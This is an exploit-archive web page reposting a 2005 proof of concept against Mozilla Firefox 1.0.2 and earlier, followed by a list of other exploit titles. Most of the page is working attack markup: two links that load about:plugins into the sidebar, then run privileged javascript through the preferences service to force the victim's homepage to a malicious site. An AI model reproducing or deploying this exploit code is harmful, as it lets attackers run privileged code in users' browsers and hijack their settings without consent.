exploits , vulnerabilities , articles , Mozilla Firefox 1.0.2 and prior Sidebar Code Execution Exploit

2005-04-16

Mozilla Firefox 1.0.2 and prior Sidebar Code Execution Exploit

Rated as : Critical 

// FrSIRT Comment : If a user clicks on a link, this code will load
"about:plugins"
// into Firefox sidebar panel and will overwrite
"browser.startup.homepage", 
// which will change the homepage to malicious.com

<a href="about:plugins" target="_search">Click
Here First</a><br>
<a href="javascript: var prefs =
Components.classes['@mozilla.org/preferences-service;1']
.getService(Components.interfaces.nsIPrefBranch);
prefs.setCharPref('browser.startup.homepage',
'http://www.malicious.com/');" target="_search">Next,
Click Here</a></p>
securitydot.net - 2005-04-16

Exploits - newest 10 RSS | More

2007-06-15 38587 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20177 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 24024 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20119 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12396 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10545 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12767 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10610 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22795 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11105 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit